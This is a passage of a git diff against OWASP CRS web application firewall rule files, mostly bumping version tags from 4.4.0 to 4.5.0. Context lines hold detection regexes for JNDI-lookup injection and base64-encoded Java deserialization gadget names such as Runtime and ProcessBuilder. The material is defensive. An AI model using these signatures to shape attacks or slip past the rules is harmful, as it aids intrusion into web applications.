"id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)(?:[^\}]*(?:\$|$?)(?:\{|&l(?:brace|cub);?)|jndi|ctx)" \ "id:944151,\ phase:2,\ @@ -148,7 +148,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -167,7 +167,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -186,7 +186,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -206,7 +206,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -226,7 +226,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -246,12 +246,12 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ "@rx (?:cnVudGltZQ|HJ1bnRpbWU|BydW50aW1l|cHJvY2Vzc2J1aWxkZXI|HByb2Nlc3NidWlsZGVy|Bwcm9jZXNzYnVpbGRlcg|Y2xvbmV0cmFuc2Zvcm1lcg|GNsb25ldHJhbnNmb3JtZXI|BjbG9uZXRyYW5zZm9ybWVy|Zm9yY2xvc3VyZQ|GZvcmNsb3N1cmU|Bmb3JjbG9zdXJl|aW5zdGFudGlhdGVmYWN0b3J5|Gluc3RhbnRpYXRlZmFjdG9yeQ|BpbnN0YW50aWF0ZWZhY3Rvcnk|aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg|Gluc3RhbnRpYXRldHJhbnNmb3JtZXI|BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy|aW52b2tlcnRyYW5zZm9ybWVy|Gludm9rZXJ0cmFuc2Zvcm1lcg|BpbnZva2VydHJhbnNmb3JtZXI|cHJvdG90eXBlY2xvbmVmYWN0b3J5|HByb3RvdHlwZWNsb25lZmFjdG9yeQ|Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk|cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk|HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5|Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ|d2hpbGVjbG9zdXJl|HdoaWxlY2xvc3VyZQ|B3aGlsZWNsb3N1cmU)" \ "id:944300,\ @@ -268,12 +268,12 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)" \ "id:944152,\ phase:2,\ @@ -289,7 +289,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf index 4881918..74758f5 100644 --- a/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf +++ b/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -14,7 +14,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ "id:949152,\ @@ -23,7 +23,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ "id:949053,\ @@ -32,7 +32,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ "id:949153,\ @@ -41,7 +41,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ "id:949054,\ @@ -50,7 +50,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ "id:949154,\ @@ -59,7 +59,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ "id:949055,\ @@ -68,7 +68,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ "id:949155,\ @@ -77,7 +77,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecAction \ "id:949059,\ @@ -86,7 +86,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=0'" SecAction \ "id:949159,\ @@ -95,7 +95,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=0'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ "id:949060,\ @@ -104,7 +104,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ "id:949160,\ @@ -113,7 +113,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ "id:949061,\ @@ -122,7 +122,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ "id:949161,\ @@ -131,7 +131,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ "id:949062,\ @@ -140,7 +140,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ "id:949162,\ @@ -149,7 +149,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ "id:949063,\ @@ -158,7 +158,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ "id:949163,\ @@ -167,7 +167,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecMarker "BEGIN-REQUEST-BLOCKING-EVAL" SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ @@ -178,7 +178,7 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ chain" SecRule TX:EARLY_BLOCKING "@eq 1" SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ @@ -189,13 +189,13 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" + ver:'OWASP_CRS/4.5.0'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" SecMarker "END-REQUEST-949-BLOCKING-EVALUATION" diff --git a/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf b/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf index ae3bab1..a83b774 100644 --- a/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf +++ b/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Index of|>\[To Parent Directory\]
)" \ "id:950130,\ phase:4,\ @@ -33,7 +33,7 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Inde tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54/127',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ @@ -52,11 +52,11 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ "id:950100,\ phase:3,\ @@ -73,11 +73,11 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ tag:'OWASP_CRS',\ tag:'capec/1000/152',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES" SecMarker "END-RESPONSE-950-DATA-LEAKAGES" diff --git a/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf index c7b79d2..c08aa34 100644 --- a/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf +++ b/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \ "id:951100,\ phase:4,\ @@ -29,7 +29,7 @@ SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \ tag:'attack-disclosure',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-SQL-ERROR-MATCH-PL1" SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ "id:951110,\ @@ -46,7 +46,7 @@ SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Micr tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/4.4.0',\ + 